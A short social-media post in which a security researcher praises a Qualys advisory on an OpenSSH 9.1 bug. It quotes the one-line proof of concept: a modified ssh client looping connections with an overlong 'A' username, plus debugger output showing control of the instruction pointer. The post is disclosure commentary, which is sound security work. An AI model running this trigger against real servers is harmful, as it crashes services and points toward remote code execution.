Post ASeyG7WSsvEYGIybJI by hdm@infosec.exchange
2023-02-14T04:53:11Z
0 likes, 4 repeats
This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92

Here I was thinking this bug was hopeless and they one-line it without writing new code:

$ cp -i /usr/bin/ssh ./ssh
$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh
$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l "$user:$user" 192.168.56.123 ;done
...
#1 0x4141414141414141 in ?? ()